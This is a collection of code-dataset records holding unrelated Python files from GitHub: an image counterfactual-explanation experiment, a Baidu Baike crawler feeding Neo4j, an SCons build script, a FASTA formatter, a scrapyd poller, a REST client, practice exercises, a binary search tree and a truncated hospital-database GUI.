loadedImages = []\r\n for image in 
imagesList:\r\n img = Image.open(path + image).resize(imshape)\r\n img = np.array(img)/255.0\r\n # Only add image if right shape and number of channels\r\n if img.shape == (224,224,3): \r\n loadedImages.append(img)\r\n return loadedImages\r\n\r\n#%% Classes to consider\r\n \r\npath = r'C:\\Users\\tvermeire\\Dropbox\\Images'\r\nclasses = listdir(path)\r\n\r\n\r\n#%%\r\n\r\ntime_limit = 15\r\n\r\nfor class_name in classes:\r\n \r\n # Import \r\n path_images = 'C:/Users/tvermeire/Dropbox/Images/' + class_name + '/' \r\n images = loadImages(path_images,IMAGE_SHAPE)\r\n \r\n images = images[0:100]\r\n\r\n\r\n # Create directory\r\n os.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder\\removal_experiment\\output')\r\n os.mkdir(class_name)\r\n \r\n # Experiment\r\n\r\n table = dfObj = pd.DataFrame(columns=['Image', 'k_mean', 's_mean', 'ct_mean', 'nc_mean', 'k_blur', 's_blur', 'ct_blur', 'nc_blur', 'k_random', 's_random', 'ct_random', 'nc_random', 'k_inpaint', 's_inpaint', 'ct_inpaint', 'nc_inpaint'], index = [i for i in range(len(images))])\r\n \r\n n = 0 #index counter\r\n \r\n too_long_mean = 0\r\n too_long_blur = 0\r\n too_long_random = 0\r\n too_long_inpaint = 0\r\n \r\n for image in images: \r\n \r\n # Classify image\r\n result = classifier.predict(image[np.newaxis, ...])\r\n predicted_class = np.argmax(result[0], axis=-1)\r\n \r\n print('Classification done')\r\n \r\n # Segment image\r\n segments = quickshift(image, kernel_size=4, max_dist=200, ratio=0.2)\r\n print('Segmentation done')\r\n \r\n # SEDC mean\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'mean', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_mean = len(segments_in_explanation)\r\n s_mean = segments_in_explanation\r\n ct_mean = stop-start\r\n nc_mean = imagenet_labels[new_class]\r\n else: \r\n k_mean = np.nan\r\n s_mean = np.nan\r\n ct_mean = np.nan\r\n nc_mean = np.nan\r\n too_long_mean += 1\r\n \r\n print('SEDC mean done') \r\n \r\n # SEDC blur\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'blur', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_blur = len(segments_in_explanation)\r\n s_blur = segments_in_explanation\r\n ct_blur = stop-start\r\n nc_blur = imagenet_labels[new_class]\r\n else: \r\n k_blur = np.nan\r\n s_blur = np.nan\r\n ct_blur = np.nan\r\n nc_blur = np.nan\r\n too_long_blur += 1\r\n \r\n print('SEDC blur done')\r\n \r\n # SEDC random\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'random', time_limit)\r\n stop = time.time()\r\n if too_long == False:\r\n k_random = len(segments_in_explanation)\r\n s_random = segments_in_explanation\r\n ct_random = stop-start\r\n nc_random = imagenet_labels[new_class]\r\n else: \r\n k_random = np.nan\r\n s_random = np.nan\r\n ct_random = np.nan\r\n nc_random = np.nan\r\n too_long_random += 1\r\n \r\n print('SEDC random done')\r\n \r\n # SEDC inpaint\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'inpaint', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_inpaint = len(segments_in_explanation)\r\n s_inpaint = segments_in_explanation\r\n ct_inpaint = stop-start \r\n nc_inpaint = 
imagenet_labels[new_class]\r\n        else: \r\n            k_inpaint = np.nan\r\n            s_inpaint = np.nan\r\n            ct_inpaint = np.nan\r\n            nc_inpaint = np.nan\r\n            too_long_inpaint += 1\r\n        \r\n        print('SEDC inpaint done')\r\n        \r\n        # Put metrics in table\r\n        \r\n        table['Image'][n] = image\r\n        table['k_mean'][n] = k_mean\r\n        table['s_mean'][n] = s_mean\r\n        table['ct_mean'][n] = ct_mean\r\n        table['nc_mean'][n] = nc_mean\r\n        table['k_blur'][n] = k_blur\r\n        table['s_blur'][n] = s_blur\r\n        table['ct_blur'][n] = ct_blur\r\n        table['nc_blur'][n] = nc_blur\r\n        table['k_random'][n] = k_random\r\n        table['s_random'][n] = s_random\r\n        table['ct_random'][n] = ct_random\r\n        table['nc_random'][n] = nc_random\r\n        table['k_inpaint'][n] = k_inpaint\r\n        table['s_inpaint'][n] = s_inpaint\r\n        table['ct_inpaint'][n] = ct_inpaint\r\n        table['nc_inpaint'][n] = nc_inpaint\r\n        \r\n        n += 1\r\n        print(\"Image \" + str(n) + \" done\")\r\n\r\n    # Output table \r\n    os.chdir('C:/Users/tvermeire/Dropbox/Doctoraat/Applied Data Mining/XAI images/Spyder/removal_experiment/output/'+ class_name)\r\n    with pd.ExcelWriter(class_name + '.xlsx') as writer: \r\n        table.to_excel(writer)\r\n    os.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder')\r\n    \r\n    \r\n","repo_name":"ADMAntwerp/ImageCounterfactualExplanations","sub_path":"isedc/experiment_comparison_sedc_removal.py","file_name":"experiment_comparison_sedc_removal.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43099097433","text":"import requests\nfrom lxml import etree\nfrom py2neo import *\n\nhead = {\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n}\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\nnode_matcher = NodeMatcher(graph)\nr_matcher = RelationshipMatcher(graph)\n\n# Crawl the list of character URLs\ndef create_role_list(movie_url):\n    html = requests.get(movie_url,headers=head)\n    html.encoding=\"utf-8\"\n    html = html.text\n    selector = etree.HTML(html)\n    content = selector.xpath(\"//html\")[0]\n    role_list = content.xpath(\"//div[@class='role-name']//a/@href\")\n    #name_list = content.xpath(\"//div[@class='role-name']/span/a/text()\")\n    role_list = [\"https://baike.baidu.com\"+i for i in role_list]\n    return role_list\n\n\n# Crawl a character's info\ndef role_info(url):\n    param = {}\n    html = requests.get(url, headers=head)\n    html.encoding = \"utf-8\"\n    html = html.text\n    selector = etree.HTML(html)\n    content = selector.xpath(\"//html\")[0]\n    img = content.xpath(\"//div[@class='summary-pic']//img/@src\")\n    if img:\n        param['img'] = img[0]\n    info_list = content.xpath(\"//dt[@class='basicInfo-item name']/text()\")\n    info_value = content.xpath(\"//dd[@class='basicInfo-item value']\")\n    info_len = len(info_list)\n    for i in range(0, info_len):\n        param[info_list[i].replace('\\xa0', '')] = info_value[i].xpath(\"string(.)\").replace('\\n', '')\n\n    if param:\n        del param['中文名']\n\n    return (param)\n\n\n# Crawl the relationship table and store it, together with the character info, in the Neo4j database\ndef create_relationship(role_url):\n    graph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n    html = requests.get(role_url, headers=head)\n    html.encoding = \"utf-8\"\n    html = html.text\n    selector = etree.HTML(html)\n    content = selector.xpath(\"//html\")[0]\n    n_rel = len(content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::div/following-sibling::\\\n                table[1]/tr[position()>1]\"))\n    role_name = 
content.xpath(\"//dd[@class='lemmaWgt-lemmaTitle-title']/h1/text()\")[0]\n\n    source = node_matcher.match(name=role_name).first()\n    if not source:\n        param = role_info(\"https://baike.baidu.com/item/\" + role_name)\n        source = Node(\"role\", name=role_name, **param)\n        graph.create(source)\n\n    for i in range(2, 2 + n_rel):\n        target_name = content.xpath(\"//div/h2[contains(string(),'关系')]/ \\\n                    ancestor::div/following-sibling::table/tr[\" + str(i) + \"]/td[1]//text()\")[0]\n        rel = content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::div/\\\n                    following-sibling::table/tr[\" + str(i) + \"]/td[2]//text()\")[0]\n        desc = content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::\\\n                    div/following-sibling::table/tr[\" + str(i) + \"]/td[3]//text()\")[0]\n        target = node_matcher.match(name=target_name).first()\n        if not target:\n            param = role_info(\"https://baike.baidu.com/item/\" + target_name)\n            target = Node(\"role\", name=target_name, **param)\n            graph.create(target)\n        graph.create(Relationship(source, rel, target, describe=desc))\n\n\n# Run\n\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n\nmovie_url = \"https://baike.baidu.com/item/%E5%8D%83%E4%B8%8E%E5%8D%83%E5%AF%BB\" # Baidu Baike page for Spirited Away\nrole_list = create_role_list(movie_url)\n\nfor i in role_list:\n    create_relationship(i)\n\nnode_matcher = NodeMatcher(graph)\nr_matcher = RelationshipMatcher(graph)\n\n\n# Manual data fixes\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n\n# Delete the fake Boh node\ngraph.run(\"MATCH ()-[r:宝宝]->(n) DELETE r,n\")\n# Add the real Boh relationship\ntang = node_matcher.match(name='汤婆婆').first()\nfang = node_matcher.match(name='坊宝宝').first()\ngraph.create(Relationship(tang,'宝宝',fang,describe='坊宝宝是汤屋的主管——汤婆婆的独子'))\n# Add the No-Face relationship\nlian = node_matcher.match(name='无脸男').first()\nqian = node_matcher.match(name='荻野千寻').first()\ngraph.create(Relationship(lian,'喜欢',qian))\n\n# Manually add Lin's info\nling = node_matcher.match(name='小玲').first()\nling['img'] = \"https://gss3.bdstatic.com/-Po3dSag_xI4khGkpoWK1HF6hhy/baike/w%3D268%3Bg%3D0/sign=a7bc12155bdf8db1bc2e7b623118ba69/7af40ad162d9f2d3acf03762acec8a136227cc5e.jpg\"\nling['性别'] = '女'\ngraph.push(ling)","repo_name":"Cloud-Wong/QianXun","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22991315212","text":"import os\n\n########################################################################################################################\n\nAlias(\"all\", \".\")\nCacheDir(\"/tmp/\")\nDecider('MD5-timestamp')\nSetOption('max_drift', 1)\nSetOption('implicit_cache', 1)\nSourceCode(\".\", None)\nSetOption('num_jobs', 3)\n\n########################################################################################################################\n\ndef UnitTest(self, target, source):\n    cwd = Dir(\"#\").abspath + \"/\"\n    self.Program(target, source)\n    self[\"TESTBIN\"] = os.path.relpath(target, cwd)\n    self[\"TESTRES\"] = \"${TESTBIN}.res\"\n    self[\"TESTCOM\"] = \"./${TESTBIN} > ${TESTRES}\"\n    self[\"TESTCOMSTR\"] = \"${TESTCOM}\" if self[\"VERBOSE\"] else \" TEST ${TARGET}\"\n    test = Action(\"${TESTCOM}\", \"${TESTCOMSTR}\", cwd=cwd)\n    self.Command(target + \".res\", target, test)\n    \ndef MockMe(self, target, source):\n    cwd = Dir(\"#\").abspath + \"/\"\n    self[\"MOCKMEDEFINES\"] = \" \".join(\"-D\" + x for x in self.get(\"CPPDEFINES\", []))\n    self[\"MOCKMEPATH\"] = \" \".join(\"-I\" + os.path.relpath(str(Dir(x)), cwd) for x in 
self.get(\"CPPPATH\", []))\n self[\"FAKE_LIBC\"] = \"include/mockme/fake_libc\"\n self[\"MOCKMECOM\"] = \"mockme/mockme ${MOCKMEDEFINES} ${MOCKMEPATH} -I${FAKE_LIBC} ${SOURCE} -o ${TARGET}\"\n self[\"MOCKMECOMSTR\"] = \"${MOCKMECOM}\" if self[\"VERBOSE\"] else \" MOCK ${TARGET}\"\n mockme = Action(\"${MOCKMECOM}\", \"${MOCKMECOMSTR}\", cwd=cwd)\n self.Command(target, [ source, \"#mockme/mockme\" ], mockme)\n \nAddMethod(Environment, UnitTest)\nAddMethod(Environment, MockMe)\n\n########################################################################################################################\n\nvariables = Variables()\nvariables.Add(BoolVariable(\"VERBOSE\", \"set to 1 in order to display the build commands as they are executed\", True))\n \nbase = Environment(variables=variables, ENV=os.environ)\nbase[\"CC\"] = \"gcc -m32\"\nbase[\"OBJPREFIX\"] = \".\"\n\nif not base[\"VERBOSE\"]:\n base[\"CCCOMSTR\"] = \" CC ${TARGET}\"\n base[\"SHCCCOMSTR\"] = \" CC ${TARGET}\"\n base[\"SHLINKCOMSTR\"] = \" LD ${TARGET}\"\n base[\"ARCOMSTR\"] = \" AR ${TARGET}\"\n base[\"LINKCOMSTR\"] = \" LD ${TARGET}\"\n base[\"RANLIBCOMSTR\"] = \" RL ${TARGET}\"\n \nHelp(variables.GenerateHelpText(base))\n\n########################################################################################################################\n\nroot = base.Clone()\nroot.MergeFlags(\"-Wall -Wextra -O3\")\nroot.MergeFlags(\"-ggdb -O0\")\nExport(\"root\")\n\nSConscript(\"mockme/SConscript\")\nSConscript(\"test/SConscript\")\nSConscript(\"demo/SConscript\")\n\n########################################################################################################################\n","repo_name":"meuter/mockme","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"40381713225","text":"\"\"\"\nFASTA formatter\n\"\"\"\nclass FASTAFormatter(object):\n \"\"\"Formatter for FASTA files\"\"\"\n def __init__(self, theme):\n \"\"\"Creates a new FASTAFormatter instance\"\"\"\n import os\n from cats.styles.sequence import SequenceFormatter\n\n # Load sequence formatter\n self.seq_formatter = SequenceFormatter(theme)\n\n def format(self, inbuffer, outbuffer=None, **kwargs):\n \"\"\"Format sequence records\"\"\"\n import sys\n\n # default/bold text\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\n # default to STDOUT for output\n if outbuffer is None:\n outbuffer = sys.stdout\n\n # Iterate through and format each sequence record\n if kwargs['color']:\n for line in inbuffer:\n line = line.decode()\n\n # Reset formatting\n outbuffer.write(RESET)\n\n # Print description\n if line.startswith('>'):\n outbuffer.write(BOLD + line)\n continue\n\n # DNA/RNA\n if kwargs['seq_type'] in ['dna', 'rna', 'nucleic_acid']:\n outbuffer.write(self.seq_formatter.format_nucleic_acid(\n line, kwargs['stop_codons'], kwargs['cpg']\n ))\n else:\n # Protein\n outbuffer.write(self.seq_formatter.format_protein(line))\n else:\n for line in inbuffer:\n outbuffer.write(line.decode())\n\nclass UnrecognizedInput(IOError):\n \"\"\"Unrecognized input error\"\"\"\n pass\n","repo_name":"khughitt/cats","sub_path":"cats/formatters/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"19726685423","text":"from twisted.internet.defer import DeferredQueue, inlineCallbacks, maybeDeferred, returnValue\nfrom zope.interface 
import implementer\n\nfrom scrapyd.interfaces import IPoller\nfrom scrapyd.utils import get_spider_queues\n\n\n@implementer(IPoller)\nclass QueuePoller(object):\n\n def __init__(self, config):\n self.config = config\n self.update_projects()\n self.dq = DeferredQueue()\n\n @inlineCallbacks\n def poll(self):\n if not self.dq.waiting:\n return\n for p, q in self.queues.items():\n c = yield maybeDeferred(q.count)\n if c:\n msg = yield maybeDeferred(q.pop)\n if msg is not None: # In case of a concurrently accessed queue\n returnValue(self.dq.put(self._message(msg, p)))\n\n def next(self):\n return self.dq.get()\n\n def update_projects(self):\n self.queues = get_spider_queues(self.config)\n\n def _message(self, queue_msg, project):\n d = queue_msg.copy()\n d['_project'] = project\n d['_spider'] = d.pop('name')\n return d\n","repo_name":"scrapy/scrapyd","sub_path":"scrapyd/poller.py","file_name":"poller.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":2733,"dataset":"github-code","pt":"37"} +{"seq_id":"71385819309","text":"import json\nimport requests # http requests\n\n\n\nBASE_URL = \"http://127.0.0.1:8000/\"\n\nENDPOINT = \"api/updates/\"\n\n\ndef get_list(id=None): #--> Lists all this out\n data = json.dumps({})\n if id is not None:\n data = json.dumps({\"id\": id})\n r = requests.get(BASE_URL + ENDPOINT, data=data)\n print(r.status_code)\n status_code = r.status_code\n if status_code != 200: # not found\n print('probably not good sign?')\n data = r.json()\n return data\n\n\n\ndef create_update():\n new_data = {\n 'user': 1,\n \"content\": \"Another more cool content\" \n }\n r = requests.post(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\nprint(get_list())\n\n# print(create_update())\n\n\ndef do_obj_update():\n new_data = {\n \"id\": 3,\n \"content\": \"awesomer\" \n }\n r = requests.put(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n # new_data = {\n # 'id': 1\n # \"content\": \"Another more cool content\" \n # }\n # r = requests.put(BASE_URL + ENDPOINT, data=new_data)\n #print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\ndef do_obj_delete():\n new_data = {\n \"id\": 3\n }\n r = requests.delete(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n # new_data = {\n # 'id': 1\n # \"content\": \"Another more cool content\" \n # }\n # r = requests.put(BASE_URL + ENDPOINT, data=new_data)\n #print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\n\n# print(do_obj_update())\n\n\n\n","repo_name":"codingforentrepreneurs/REST-API","sub_path":"scripts/cfe_pure_api.py","file_name":"cfe_pure_api.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"37"} +{"seq_id":"12069159421","text":"# ### 6092\n# n = int(input())\n# att_list = list(map(int, input().split()))\n# if len(att_list)!=n:\n# exit()\n# std_list = [0] * 23\n# for i in att_list:\n# if i<=0 or i>23:\n# exit()\n# std_list[i-1] +=1\n\n# for i in std_list:\n# print(i, end=' ')\n\n# ### 6093\n# n = int(input())\n# att_list = list(map(int, input().split()))\n# if(len(att_list)!=n):\n# exit()\n# for i in reversed(att_list):\n# print(i, end=' ')\n\n# ### 6094\n# n = int(input())\n# att_list = 
list(map(int, input().split()))\n\n# if len(att_list)!=n:\n#     exit()\n\n# res = att_list[0]\n\n# for i in att_list:\n#     res = min(res, i)\n# print(res)\n\n# ### 6095\n# # *** 2D array\n# board = [[0] * 19 for _ in range(19)]\n# n = int(input())\n# for _ in range(n):\n#     i, j = input().split()\n#     board[int(i)-1][int(j)-1] = 1\n\n# for i in range(19):\n#     for j in range(19):\n#         if j==18:\n#             print(board[i][j])\n#         else:\n#             print(board[i][j], end = ' ')\n\n# ### 6096\n# board = [[0] * 19 for _ in range(19)]\n# for i in range(19):\n#     board[i] = list(map(int, input().split()))\n#     if len(board[i]) != 19:\n#         exit()\n# n = int(input())\n\n# for _ in range(n):\n#     x, y = input().split()\n#     x = int(x) -1\n#     y = int(y) -1\n#     for i in range(19):\n#         if board[i][y] == 0:\n#             board[i][y] = 1\n#         else:\n#             board[i][y] = 0\n        \n#         if board[x][i] == 0:\n#             board[x][i] = 1\n#         else:\n#             board[x][i] = 0\n\n# for i in range(19):\n#     for j in range(19):\n#         print(board[i][j], end = \" \")\n#     print()\n\n# ### 6097\n# h, w = input().split()\n# w = int(w)\n# h = int(h)\n# board = [[0]*w for _ in range(h)]\n\n# n = int(input())\n\n# for _ in range(n):\n#     l, d, x, y = input().split()\n#     l = int(l)\n#     d = int(d)\n#     x = int(x) -1\n#     y = int(y) -1\n\n#     if d == 0:\n#         for i in range(l):\n#             if y + i < w:\n#                 board[x][y + i] = 1\n#     elif d==1:\n#         for i in range(l):\n#             if x + i < h:\n#                 board[x + i][y] = 1\n\n# for i in range(h):\n#     for j in range(w):\n#         print(board[i][j], end = \" \")\n#     print()\n\n### 6098\nboard = [[0] * 10 for _ in range(10)]\nfor i in range(10):\n    board[i] = list(map(int, input().split()))\n\nx = 1\ny = 1\n\nwhile True:\n    if board[y][x] == 2:\n        board[y][x] = 9\n        break\n    elif board[y][x + 1] !=1:\n        board[y][x] = 9\n        x +=1\n    elif board[y + 1][x] !=1:\n        board[y][x] = 9\n        y +=1\n    else:\n        board[y][x] = 9\n        break\n\nfor i in range(10):\n    for j in range(10):\n        print(board[i][j], end = \" \")\n    print()\n\n    ### commit test\n    ","repo_name":"SooonChang/ps-solutions","sub_path":"codeup/python_basic_100/6092_6098.py","file_name":"6092_6098.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70921926509","text":"class SearchTree:\n\n    def __init__(self, value=None):\n        if value is None:\n            self.baseNode = None\n        else:\n            self.baseNode = Node(value)\n\n    def insert(self, value):\n        if self.baseNode is not None:\n            self.baseNode.insert(value)\n        else:\n            self.baseNode = Node(value)\n\n    def find(self, value):\n        if self.baseNode is not None:\n            return self.baseNode.find(value)\n        else:\n            return None\n\n    def delete(self, value):\n        if self.baseNode is not None:\n            if self.baseNode.value == value:\n                # deleting the baseNode\n                if not self.baseNode.has_children():\n                    self.baseNode = None\n                elif self.baseNode.has_one_child():\n                    if self.baseNode.left is not None:\n                        self.baseNode = self.baseNode.left\n                    else:\n                        self.baseNode = self.baseNode.right\n                else:\n                    self.baseNode = self.baseNode.delete(value)\n            else:\n                self.baseNode.delete(value)\n\n    def traverse(self):\n        if self.baseNode is not None:\n            self.baseNode.traverse()\n        else:\n            print('Empty')\n\n\nclass Node:\n\n    def __init__(self, value, parent=None, left=None, right=None):\n        self.parent = parent\n        self.value = value\n        self.left = left\n        self.right = right\n\n    def __str__(self):\n        return '{}'.format(self.value)\n\n    def insert(self, new_value):\n        if self.value != new_value:\n            if new_value > self.value:\n                if self.right is not None:\n                    self.right.insert(new_value)\n                else:\n                    self.right = Node(new_value, self)\n            elif 
new_value < self.value:\n if self.left is not None:\n self.left.insert(new_value)\n else:\n self.left = Node(new_value, self)\n else:\n print(new_value, \"already in tree\")\n\n def find(self, searching_value):\n result = None\n\n if self.value is searching_value:\n result = self\n else:\n if searching_value > self.value:\n if self.right is not None:\n result = self.right.find(searching_value)\n else:\n if self.left is not None:\n result = self.left.find(searching_value)\n\n return result\n\n def traverse(self):\n if self.left is not None:\n self.left.traverse()\n print(self.value)\n if self.right is not None:\n self.right.traverse()\n\n def delete(self, value_for_delete):\n\n node_for_delete = self.find(value_for_delete)\n\n if node_for_delete is not None:\n\n # удаление крайнего элемента(без child элементов)\n if not node_for_delete.has_children():\n\n if node_for_delete.is_left():\n node_for_delete.parent.left = None\n else:\n node_for_delete.parent.right = None\n\n # удаление элемена, имеющего 1 child элемент\n elif node_for_delete.has_one_child():\n\n if node_for_delete.is_left():\n\n if node_for_delete.left is not None:\n node_for_delete.parent.left, node_for_delete.left.parent = \\\n node_for_delete.left, node_for_delete.parent\n else:\n node_for_delete.parent.left, node_for_delete.right.parent = \\\n node_for_delete.right, node_for_delete.parent\n else:\n if node_for_delete.left is not None:\n node_for_delete.parent.right, node_for_delete.left.parent = \\\n node_for_delete.left, node_for_delete.parent\n else:\n node_for_delete.parent.right, node_for_delete.right.parent = \\\n node_for_delete.right, node_for_delete.parent\n\n # удаление элемента, имеющего оба child элемента\n else:\n # элемент, которым будет заменён удаляемый\n node_for_replace = node_for_delete.find_min_above()\n\n # ближайший элемент, который больше чем удаляемый - оказался его right child\n if node_for_delete.right is node_for_replace:\n node_for_replace.left = node_for_delete.left\n node_for_delete.left.parent = node_for_replace\n if node_for_delete.parent is None:\n # если удалялся baseNode - возвращается replace элемент для установки в кач-ве baseNode\n node_for_replace.parent = None\n return node_for_replace\n else:\n # если удалялся не baseNode\n if node_for_delete.is_left():\n node_for_delete.parent.left = node_for_replace\n node_for_replace.parent = node_for_delete.parent\n else:\n node_for_delete.parent.right = node_for_replace\n node_for_replace.parent = node_for_delete.parent\n\n else:\n if node_for_replace.right is not None:\n # если у replace елемента есть right child - отвязывается от replace элемента и привязывается\n # к replace.parent - в роли left child\n node_for_replace.parent.left = node_for_replace.right\n node_for_replace.right.parent = node_for_replace.parent\n\n # left и right от delete элемента переходят к replace элементу\n node_for_replace.left, node_for_replace.right = \\\n node_for_delete.left, node_for_delete.right\n node_for_delete.left.parent, node_for_delete.right.parent = \\\n node_for_replace, node_for_replace\n\n if node_for_delete.parent is None:\n # если удалялся baseNode - возвращается replace элемент для установки в кач-ве baseNode\n node_for_replace.parent = None\n return node_for_replace\n else:\n # иначе replace привязывается к delete.parent\n if node_for_delete.is_left():\n node_for_delete.parent.left = node_for_replace\n else:\n node_for_delete.parent.right = node_for_replace\n\n def find_min_above(self):\n min_above = self.right\n while min_above.left is not None:\n 
min_above = min_above.left\n        return min_above\n\n    def has_one_child(self):\n        return ((self.left is not None) and (self.right is None)) or ((self.left is None) and (self.right is not None))\n\n    def is_left(self):\n        return self.parent.left is self\n\n    def has_children(self):\n        return self.left is not None or self.right is not None\n","repo_name":"SergeyKurmenev/searchTree","sub_path":"searchTree.py","file_name":"searchTree.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41818401880","text":"# Reads a list of students and all of their marks\n# returns the average mark of the queried student\n\nn = int(input())\n\nstudent_marks = {}\n\nfor _ in range(n):\n    name, *line = input().split()\n    scores = list(map(float, line))\n    student_marks[name] = scores\n\nquery_name = input()\n\naverage = 0\n\nfor i in student_marks[query_name]:\n    average += i\n\naverage /= len(student_marks[query_name])\n\nprint(\"%.2f\" % average)\n","repo_name":"pedroportilho/hacker-rank-python","sub_path":"exercises/11_finding_the_percentage.py","file_name":"11_finding_the_percentage.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17797296365","text":"import PySimpleGUI as sg\r\nimport mysql.connector\r\n\r\ndbms = mysql.connector.connect(host=\"localhost\",\r\n                               user=\"root\",\r\n                               passwd=\"Dc762019\",\r\n                               database=\"hope_hosp\")\r\nmyCursor = dbms.cursor()\r\n\r\nsg.theme('Black')\r\nsg.set_options(font='Courier 16')\r\n\r\nPatientsData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.PATIENT\")\r\nfor i in myCursor:\r\n    PatientsData.append(list(i))\r\nheadersPatients = ['PatientID', 'FirstName', 'LastName', 'Phone', 'Gender', 'EmergencyContact', 'ConditionDetails',\r\n                   'AdmissionDate']\r\n\r\nDepartmentData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.DEPARTMENT\")\r\nfor j in myCursor:\r\n    DepartmentData.append(list(j))\r\nheadersDepartment = ['DepartmentID', 'DepatmentName', 'DepartmentHead', 'OfficeNumber', 'OfficePhone']\r\n\r\nDoctorsData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.DOCTOR\")\r\nfor k in myCursor:\r\n    DoctorsData.append(list(k))\r\nheadersDoctor = ['DoctorID', 'Fristname', 'LastName', 'DepartmentID']\r\n\r\nNursesData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.NURSE\")\r\nfor l in myCursor:\r\n    NursesData.append(list(l))\r\nheadersNurse = ['NurseID', 'FristName', 'LastName', 'DepartmentID']\r\n\r\nFacultyData = []\r\nmyCursor.execute(\"SELECT * FROM hope_hosp.FACULTY\")\r\nfor m in myCursor:\r\n    FacultyData.append(list(m))\r\nheadersFaculty = ['FacultyID', 'FirstName', 'LastName', 'DepartmentID']\r\n\r\n\r\n# functions that push fresh data to the display tables when refreshing\r\ndef refresh_patients():\r\n    dbms2 = mysql.connector.connect(host=\"localhost\",\r\n                                    user=\"root\",\r\n                                    passwd=\"Dc762019\",\r\n                                    database=\"hope_hosp\")\r\n    myCursor2 = dbms2.cursor()\r\n    data = []\r\n    myCursor2.execute(\"SELECT * FROM hope_hosp.patient;\")\r\n    for j in myCursor2:\r\n        data.append(list(j))\r\n    window1['-table1-'].Update(values=data)\r\n    sg.popup(\"Patients Updated\")\r\n\r\n\r\ndef refresh_departments():\r\n    dbms2 = mysql.connector.connect(host=\"localhost\",\r\n                                    user=\"root\",\r\n                                    passwd=\"Dc762019\",\r\n                                    database=\"hope_hosp\")\r\n    myCursor2 = dbms2.cursor()\r\n    data1 = []\r\n    myCursor2.execute(\"SELECT * FROM hope_hosp.department;\")\r\n    for j in myCursor2:\r\n        data1.append(list(j))\r\n    
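# push the freshly queried rows into the Departments table widget\r\n    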
window1['-table2-'].Update(values=data1)\r\n    sg.popup(\"Departments Updated\")\r\n\r\n\r\ndef refresh_doctors():\r\n    dbms2 = mysql.connector.connect(host=\"localhost\",\r\n                                    user=\"root\",\r\n                                    passwd=\"Dc762019\",\r\n                                    database=\"hope_hosp\")\r\n    myCursor2 = dbms2.cursor()\r\n    data2 = []\r\n    myCursor2.execute(\"SELECT * FROM hope_hosp.doctor;\")\r\n    for j in myCursor2:\r\n        data2.append(list(j))\r\n    window1['-table3-'].Update(values=data2)\r\n    sg.popup(\"Doctors Updated\")\r\n\r\n\r\ndef refresh_nurses():\r\n    dbms2 = mysql.connector.connect(host=\"localhost\",\r\n                                    user=\"root\",\r\n                                    passwd=\"Dc762019\",\r\n                                    database=\"hope_hosp\")\r\n    myCursor2 = dbms2.cursor()\r\n    data3 = []\r\n    myCursor2.execute(\"SELECT * FROM hope_hosp.nurse;\")\r\n    for j in myCursor2:\r\n        data3.append(list(j))\r\n    window1['-table4-'].Update(values=data3)\r\n    sg.popup(\"Nurses Updated\")\r\n\r\n\r\ndef refresh_faculty():\r\n    dbms2 = mysql.connector.connect(host=\"localhost\",\r\n                                    user=\"root\",\r\n                                    passwd=\"Dc762019\",\r\n                                    